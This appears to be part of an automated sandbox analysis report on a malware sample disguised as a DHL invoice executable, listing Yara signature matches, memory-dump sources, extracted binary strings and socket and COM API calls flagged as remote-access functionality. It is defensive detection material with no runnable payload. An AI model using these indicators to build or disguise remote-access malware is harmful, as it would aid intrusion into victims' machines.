Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: WIN_81
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: WIN_XP
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: WIN_XPe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: WIN_VISTA
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: WIN_7
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_012C1204
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_012C1806
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0036041E CreateBindCtx,SysAllocStringByteLen,SysFreeString, 4_2_0036041E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00361AA2 CreateBindCtx,MkParseDisplayName, 4_2_00361AA2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_003566C1 CoCreateInstance,CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx, 4_2_003566C1